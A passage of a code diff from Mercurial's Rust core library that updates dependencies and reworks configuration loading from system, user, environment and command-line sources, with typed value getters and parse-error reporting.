0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" -"checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" -"checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" -"checksum 
num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" -"checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" -"checksum pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)" = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" -"checksum ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" -"checksum pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" -"checksum proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)" = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" -"checksum proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)" = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" -"checksum python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" -"checksum python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" -"checksum quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" -"checksum quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)" = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" -"checksum rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)" = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" -"checksum rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)" = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" 
-"checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" -"checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" -"checksum rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" -"checksum rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" -"checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" -"checksum rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" -"checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" -"checksum rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" -"checksum rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" -"checksum rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" -"checksum rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" -"checksum rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" -"checksum redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)" = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" -"checksum 
regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" -"checksum regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)" = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" -"checksum remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" -"checksum rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)" = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" -"checksum rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)" = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" -"checksum same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)" = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -"checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" -"checksum sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)" = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" -"checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" -"checksum strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" -"checksum syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)" = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" -"checksum tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" -"checksum termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" 
-"checksum textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" -"checksum thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" -"checksum time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" -"checksum twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)" = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" -"checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" -"checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" -"checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" -"checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" -"checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" -"checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" -"checksum wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" -"checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" -"checksum winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)" = 
"5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -"checksum winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" -"checksum winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)" = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" -"checksum winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" -"checksum zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" -"checksum zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" -"checksum zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -9,11 +9,12 @@ name = "hg" [dependencies] +bytes-cast = "0.1" byteorder = "1.3.4" -hex = "0.4.2" +derive_more = "0.99" +home = "0.5" im-rc = "15.0.*" lazy_static = "1.4.0" -memchr = "2.3.3" rand = "0.7.3" rand_pcg = "0.2.1" rand_distr = "0.2.2" @@ -27,7 +28,7 @@ memmap = "0.7.0" zstd = "0.5.3" rust-crypto = "0.2.36" -format-bytes = "0.1.2" +format-bytes = "0.2.2" # We don't use the `miniz-oxide` backend to not change rhg benchmarks and until # we have a clearer view of which backend is the fastest. @@ -40,9 +41,3 @@ clap = "*" pretty_assertions = "0.6.1" tempfile = "3.1.0" - -[features] -# Use a (still unoptimized) tree for the dirstate instead of the current flat -# dirstate. This is not yet recommended for performance reasons. A future -# version might make it the default, or make it a runtime option. 
-dirstate-tree = [] diff --git a/rust/hg-core/examples/nodemap/main.rs b/rust/hg-core/examples/nodemap/main.rs --- a/rust/hg-core/examples/nodemap/main.rs +++ b/rust/hg-core/examples/nodemap/main.rs @@ -49,7 +49,7 @@ fn query(index: &Index, nm: &NodeTree, prefix: &str) { let start = Instant::now(); - let res = nm.find_hex(index, prefix); + let res = NodePrefix::from_hex(prefix).map(|p| nm.find_bin(index, p)); println!("Result found in {:?}: {:?}", start.elapsed(), res); } @@ -66,7 +66,7 @@ .collect(); if queries < 10 { let nodes_hex: Vec<String> = - nodes.iter().map(|n| n.encode_hex()).collect(); + nodes.iter().map(|n| format!("{:x}", n)).collect(); println!("Nodes: {:?}", nodes_hex); } let mut last: Option<Revision> = None; @@ -76,11 +76,11 @@ } let elapsed = start.elapsed(); println!( - "Did {} queries in {:?} (mean {:?}), last was {:?} with result {:?}", + "Did {} queries in {:?} (mean {:?}), last was {:x} with result {:?}", queries, elapsed, elapsed / (queries as u32), - nodes.last().unwrap().encode_hex(), + nodes.last().unwrap(), last ); } diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -11,4 +11,6 @@ mod config; mod layer; -pub use config::Config; +mod values; +pub use config::{Config, ConfigValueParseError}; +pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -8,25 +8,44 @@ // GNU General Public License version 2 or any later version. 
use super::layer; -use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue}; -use std::path::PathBuf; +use super::values; +use crate::config::layer::{ + ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, +}; +use crate::utils::files::get_bytes_from_os_str; +use crate::utils::SliceExt; +use format_bytes::{write_bytes, DisplayBytes}; +use std::collections::HashSet; +use std::env; +use std::fmt; +use std::path::{Path, PathBuf}; +use std::str; -use crate::operations::find_root; -use crate::utils::files::read_whole_file; +use crate::errors::{HgResultExt, IoResultExt}; /// Holds the config values for the current repository /// TODO update this docstring once we support more sources +#[derive(Clone)] pub struct Config { layers: Vec<layer::ConfigLayer>, } -impl std::fmt::Debug for Config { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for Config { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { for (index, layer) in self.layers.iter().rev().enumerate() { - write!( - f, - "==== Layer {} (trusted: {}) ====\n{:?}", - index, layer.trusted, layer + write_bytes!( + out, + b"==== Layer {} (trusted: {}) ====\n{}", + index, + if layer.trusted { + &b"yes"[..] + } else { + &b"no"[..] 
+ }, + layer )?; } Ok(()) @@ -40,15 +59,176 @@ Parsed(layer::ConfigLayer), } -pub fn parse_bool(v: &[u8]) -> Option<bool> { - match v.to_ascii_lowercase().as_slice() { - b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), - b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), - _ => None, +#[derive(Debug)] +pub struct ConfigValueParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub section: Vec<u8>, + pub item: Vec<u8>, + pub value: Vec<u8>, + pub expected_type: &'static str, +} + +impl fmt::Display for ConfigValueParseError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + // TODO: add origin and line number information, here and in + // corresponding python code + write!( + f, + "config error: {}.{} is not a {} ('{}')", + String::from_utf8_lossy(&self.section), + String::from_utf8_lossy(&self.item), + self.expected_type, + String::from_utf8_lossy(&self.value) + ) } } impl Config { + /// Load system and user configuration from various files. + /// + /// This is also affected by some environment variables. + pub fn load( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Self, ConfigError> { + let mut config = Self { layers: Vec::new() }; + let opt_rc_path = env::var_os("HGRCPATH"); + // HGRCPATH replaces system config + if opt_rc_path.is_none() { + config.add_system_config()? + } + + config.add_for_environment_variable("EDITOR", b"ui", b"editor"); + config.add_for_environment_variable("VISUAL", b"ui", b"editor"); + config.add_for_environment_variable("PAGER", b"pager", b"pager"); + + // These are set by `run-tests.py --rhg` to enable fallback for the + // entire test suite. Alternatives would be setting configuration + // through `$HGRCPATH` but some tests override that, or changing the + // `hg` shell alias to include `--config` but that disrupts tests that + // print command lines and check expected output. 
+ config.add_for_environment_variable( + "RHG_ON_UNSUPPORTED", + b"rhg", + b"on-unsupported", + ); + config.add_for_environment_variable( + "RHG_FALLBACK_EXECUTABLE", + b"rhg", + b"fallback-executable", + ); + + // HGRCPATH replaces user config + if opt_rc_path.is_none() { + config.add_user_config()? + } + if let Some(rc_path) = &opt_rc_path { + for path in env::split_paths(rc_path) { + if !path.as_os_str().is_empty() { + if path.is_dir() { + config.add_trusted_dir(&path)? + } else { + config.add_trusted_file(&path)? + } + } + } + } + if let Some(layer) = ConfigLayer::parse_cli_args(cli_config_args)? { + config.layers.push(layer) + } + Ok(config) + } + + fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(entries) = std::fs::read_dir(path) + .when_reading_file(path) + .io_not_found_as_none()? + { + let mut file_paths = entries + .map(|result| { + result.when_reading_file(path).map(|entry| entry.path()) + }) + .collect::<Result<Vec<_>, _>>()?; + file_paths.sort(); + for file_path in &file_paths { + if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { + self.add_trusted_file(&file_path)? + } + } + } + Ok(()) + } + + fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(data) = std::fs::read(path) + .when_reading_file(path) + .io_not_found_as_none()? + { + self.layers.extend(ConfigLayer::parse(path, &data)?) 
+ } + Ok(()) + } + + fn add_for_environment_variable( + &mut self, + var: &str, + section: &[u8], + key: &[u8], + ) { + if let Some(value) = env::var_os(var) { + let origin = layer::ConfigOrigin::Environment(var.into()); + let mut layer = ConfigLayer::new(origin); + layer.add( + section.to_owned(), + key.to_owned(), + get_bytes_from_os_str(value), + None, + ); + self.layers.push(layer) + } + } + + #[cfg(unix)] // TODO: other platforms + fn add_system_config(&mut self) -> Result<(), ConfigError> { + let mut add_for_prefix = |prefix: &Path| -> Result<(), ConfigError> { + let etc = prefix.join("etc").join("mercurial"); + self.add_trusted_file(&etc.join("hgrc"))?; + self.add_trusted_dir(&etc.join("hgrc.d")) + }; + let root = Path::new("/"); + // TODO: use `std::env::args_os().next().unwrap()` a.k.a. argv[0] + // instead? TODO: can this be a relative path? + let hg = crate::utils::current_exe()?; + // TODO: this order (per-installation then per-system) matches + // `systemrcpath()` in `mercurial/scmposix.py`, but + // `mercurial/helptext/config.txt` suggests it should be reversed + if let Some(installation_prefix) = hg.parent().and_then(Path::parent) { + if installation_prefix != root { + add_for_prefix(&installation_prefix)? + } + } + add_for_prefix(root)?; + Ok(()) + } + + #[cfg(unix)] // TODO: other plateforms + fn add_user_config(&mut self) -> Result<(), ConfigError> { + let opt_home = home::home_dir(); + if let Some(home) = &opt_home { + self.add_trusted_file(&home.join(".hgrc"))? + } + let darwin = cfg!(any(target_os = "macos", target_os = "ios")); + if !darwin { + if let Some(config_home) = env::var_os("XDG_CONFIG_HOME") + .map(PathBuf::from) + .or_else(|| opt_home.map(|home| home.join(".config"))) + { + self.add_trusted_file(&config_home.join("hg").join("hgrc"))? + } + } + Ok(()) + } + /// Loads in order, which means that the precedence is the same /// as the order of `sources`. 
pub fn load_from_explicit_sources( @@ -62,7 +242,7 @@ ConfigSource::AbsPath(c) => { // TODO check if it should be trusted // mercurial/ui.py:427 - let data = match read_whole_file(&c) { + let data = match std::fs::read(&c) { Err(_) => continue, // same as the python code Ok(data) => data, }; @@ -74,13 +254,86 @@ Ok(Config { layers }) } - /// Loads the local config. In a future version, this will also load the - /// `$HOME/.hgrc` and more to mirror the Python implementation. - pub fn load() -> Result<Self, ConfigError> { - let root = find_root().unwrap(); - Ok(Self::load_from_explicit_sources(vec![ - ConfigSource::AbsPath(root.join(".hg/hgrc")), - ])?) + /// Loads the per-repository config into a new `Config` which is combined + /// with `self`. + pub(crate) fn combine_with_repo( + &self, + repo_config_files: &[PathBuf], + ) -> Result<Self, ConfigError> { + let (cli_layers, other_layers) = self + .layers + .iter() + .cloned() + .partition(ConfigLayer::is_from_command_line); + + let mut repo_config = Self { + layers: other_layers, + }; + for path in repo_config_files { + // TODO: check if this file should be trusted: + // `mercurial/ui.py:427` + repo_config.add_trusted_file(path)?; + } + repo_config.layers.extend(cli_layers); + Ok(repo_config) + } + + fn get_parse<'config, T: 'config>( + &'config self, + section: &[u8], + item: &[u8], + expected_type: &'static str, + parse: impl Fn(&'config [u8]) -> Option<T>, + ) -> Result<Option<T>, ConfigValueParseError> { + match self.get_inner(§ion, &item) { + Some((layer, v)) => match parse(&v.bytes) { + Some(b) => Ok(Some(b)), + None => Err(ConfigValueParseError { + origin: layer.origin.to_owned(), + line: v.line, + value: v.bytes.to_owned(), + section: section.to_owned(), + item: item.to_owned(), + expected_type, + }), + }, + None => Ok(None), + } + } + + /// Returns an `Err` if the first value found is not a valid UTF-8 string. + /// Otherwise, returns an `Ok(value)` if found, or `None`. 
+ pub fn get_str( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<&str>, ConfigValueParseError> { + self.get_parse(section, item, "ASCII or UTF-8 string", |value| { + str::from_utf8(value).ok() + }) + } + + /// Returns an `Err` if the first value found is not a valid unsigned + /// integer. Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_u32( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u32>, ConfigValueParseError> { + self.get_parse(section, item, "valid integer", |value| { + str::from_utf8(value).ok()?.parse().ok() + }) + } + + /// Returns an `Err` if the first value found is not a valid file size + /// value such as `30` (default unit is bytes), `7 MB`, or `42.5 kb`. + /// Otherwise, returns an `Ok(value_in_bytes)` if found, or `None`. + pub fn get_byte_size( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u64>, ConfigValueParseError> { + self.get_parse(section, item, "byte quantity", values::parse_byte_size) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -90,18 +343,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigError> { - match self.get_inner(§ion, &item) { - Some((layer, v)) => match parse_bool(&v.bytes) { - Some(b) => Ok(Some(b)), - None => Err(ConfigError::Parse { - origin: layer.origin.to_owned(), - line: v.line, - bytes: v.bytes.to_owned(), - }), - }, - None => Ok(None), - } + ) -> Result<Option<bool>, ConfigValueParseError> { + self.get_parse(section, item, "boolean", values::parse_bool) } /// Returns the corresponding boolean in the config. Returns `Ok(false)` @@ -110,10 +353,35 @@ &self, section: &[u8], item: &[u8], - ) -> Result<bool, ConfigError> { + ) -> Result<bool, ConfigValueParseError> { Ok(self.get_option(section, item)?.unwrap_or(false)) } + /// Returns the corresponding list-value in the config if found, or `None`. + /// + /// This is appropriate for new configuration keys. 
The value syntax is + /// **not** the same as most existing list-valued config, which has Python + /// parsing implemented in `parselist()` in `mercurial/config.py`. + /// Faithfully porting that parsing algorithm to Rust (including behavior + /// that are arguably bugs) turned out to be non-trivial and hasn’t been + /// completed as of this writing. + /// + /// Instead, the "simple" syntax is: split on comma, then trim leading and + /// trailing whitespace of each component. Quotes or backslashes are not + /// interpreted in any way. Commas are mandatory between values. Values + /// that contain a comma are not supported. + pub fn get_simple_list( + &self, + section: &[u8], + item: &[u8], + ) -> Option<impl Iterator<Item = &[u8]>> { + self.get(section, item).map(|value| { + value + .split(|&byte| byte == b',') + .map(|component| component.trim()) + }) + } + /// Returns the raw value bytes of the first one found, or `None`. pub fn get(&self, section: &[u8], item: &[u8]) -> Option<&[u8]> { self.get_inner(section, item) @@ -137,6 +405,14 @@ None } + /// Return all keys defined for the given section + pub fn get_section_keys(&self, section: &[u8]) -> HashSet<&[u8]> { + self.layers + .iter() + .flat_map(|layer| layer.iter_keys(section)) + .collect() + } + /// Get raw values bytes from all layers (even untrusted ones) in order /// of precedence. 
#[cfg(test)] @@ -169,15 +445,14 @@ let base_config_path = tmpdir_path.join("base.rc"); let mut config_file = File::create(&base_config_path).unwrap(); let data = - b"[section]\nitem=value0\n%include included.rc\nitem=value2"; + b"[section]\nitem=value0\n%include included.rc\nitem=value2\n\ + [section2]\ncount = 4\nsize = 1.5 KB\nnot-count = 1.5\nnot-size = 1 ub"; config_file.write_all(data).unwrap(); let sources = vec![ConfigSource::AbsPath(base_config_path)]; let config = Config::load_from_explicit_sources(sources) .expect("expected valid config"); - dbg!(&config); - let (_, value) = config.get_inner(b"section", b"item").unwrap(); assert_eq!( value, @@ -193,5 +468,13 @@ config.get_all(b"section", b"item"), [b"value2", b"value1", b"value0"] ); + + assert_eq!(config.get_u32(b"section2", b"count").unwrap(), Some(4)); + assert_eq!( + config.get_byte_size(b"section2", b"size").unwrap(), + Some(1024 + 512) + ); + assert!(config.get_u32(b"section2", b"not-count").is_err()); + assert!(config.get_byte_size(b"section2", b"not-size").is_err()); } } diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -7,14 +7,12 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::utils::files::{ - get_bytes_from_path, get_path_from_bytes, read_whole_file, -}; -use format_bytes::format_bytes; +use crate::errors::HgError; +use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; +use format_bytes::{format_bytes, write_bytes, DisplayBytes}; use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; -use std::io; use std::path::{Path, PathBuf}; lazy_static! 
{ @@ -53,6 +51,51 @@ } } + /// Parse `--config` CLI arguments and return a layer if there’s any + pub(crate) fn parse_cli_args( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Option<Self>, ConfigError> { + fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> { + use crate::utils::SliceExt; + + let (section_and_item, value) = arg.split_2(b'=')?; + let (section, item) = section_and_item.trim().split_2(b'.')?; + Some(( + section.to_owned(), + item.to_owned(), + value.trim().to_owned(), + )) + } + + let mut layer = Self::new(ConfigOrigin::CommandLine); + for arg in cli_config_args { + let arg = arg.as_ref(); + if let Some((section, item, value)) = parse_one(arg) { + layer.add(section, item, value, None); + } else { + Err(HgError::abort(format!( + "abort: malformed --config option: '{}' \ + (use --config section.name=value)", + String::from_utf8_lossy(arg), + )))? + } + } + if layer.sections.is_empty() { + Ok(None) + } else { + Ok(Some(layer)) + } + } + + /// Returns whether this layer comes from `--config` CLI arguments + pub(crate) fn is_from_command_line(&self) -> bool { + if let ConfigOrigin::CommandLine = self.origin { + true + } else { + false + } + } + /// Add an entry to the config, overwriting the old one if already present. pub fn add( &mut self, @@ -72,6 +115,14 @@ Some(self.sections.get(section)?.get(item)?) 
} + /// Returns the keys defined in the given section + pub fn iter_keys(&self, section: &[u8]) -> impl Iterator<Item = &[u8]> { + self.sections + .get(section) + .into_iter() + .flat_map(|section| section.keys().map(|vec| &**vec)) + } + pub fn is_empty(&self) -> bool { self.sections.is_empty() } @@ -96,21 +147,39 @@ let mut section = b"".to_vec(); while let Some((index, bytes)) = lines_iter.next() { + let line = Some(index + 1); if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; - let filename_to_include = get_path_from_bytes(&filename_bytes); - match read_include(&src, &filename_to_include) { - (include_src, Ok(data)) => { + let filename_bytes = crate::utils::expand_vars(filename_bytes); + // `Path::parent` only fails for the root directory, + // which `src` can’t be since we’ve managed to open it as a + // file. + let dir = src + .parent() + .expect("Path::parent fail on a file we’ve read"); + // `Path::join` with an absolute argument correctly ignores the + // base path + let filename = dir.join(&get_path_from_bytes(&filename_bytes)); + match std::fs::read(&filename) { + Ok(data) => { layers.push(current_layer); - layers.extend(Self::parse(&include_src, &data)?); + layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); } - (_, Err(e)) => { - return Err(ConfigError::IncludeError { - path: filename_to_include.to_owned(), - io_error: e, - }) + Err(error) => { + if error.kind() != std::io::ErrorKind::NotFound { + return Err(ConfigParseError { + origin: ConfigOrigin::File(src.to_owned()), + line, + message: format_bytes!( + b"cannot include {} ({})", + filename_bytes, + format_bytes::Utf8(error) + ), + } + .into()); + } } } } else if let Some(_) = EMPTY_RE.captures(&bytes) { @@ -134,22 +203,23 @@ }; lines_iter.next(); } - current_layer.add( - section.clone(), - item, - value, - Some(index + 1), - ); + current_layer.add(section.clone(), item, value, line); } else if let Some(m) = 
UNSET_RE.captures(&bytes) { if let Some(map) = current_layer.sections.get_mut(§ion) { map.remove(&m[1]); } } else { - return Err(ConfigError::Parse { + let message = if bytes.starts_with(b" ") { + format_bytes!(b"unexpected leading whitespace: {}", bytes) + } else { + bytes.to_owned() + }; + return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), - line: Some(index + 1), - bytes: bytes.to_owned(), - }); + line, + message, + } + .into()); } } if !current_layer.is_empty() { @@ -159,8 +229,11 @@ } } -impl std::fmt::Debug for ConfigLayer { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for ConfigLayer { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { let mut sections: Vec<_> = self.sections.iter().collect(); sections.sort_by(|e0, e1| e0.0.cmp(e1.0)); @@ -169,16 +242,13 @@ items.sort_by(|e0, e1| e0.0.cmp(e1.0)); for (item, config_entry) in items { - writeln!( - f, - "{}", - String::from_utf8_lossy(&format_bytes!( - b"{}.{}={} # {}", - section, - item, - &config_entry.bytes, - &self.origin.to_bytes(), - )) + write_bytes!( + out, + b"{}.{}={} # {}\n", + section, + item, + &config_entry.bytes, + &self.origin, )? } } @@ -205,9 +275,11 @@ #[derive(Clone, Debug)] pub enum ConfigOrigin { - /// The value comes from a configuration file + /// From a configuration file File(PathBuf), - /// The value comes from the environment like `$PAGER` or `$EDITOR` + /// From a `--config` CLI argument + CommandLine, + /// From environment variables like `$PAGER` or `$EDITOR` Environment(Vec<u8>), /* TODO cli * TODO defaults 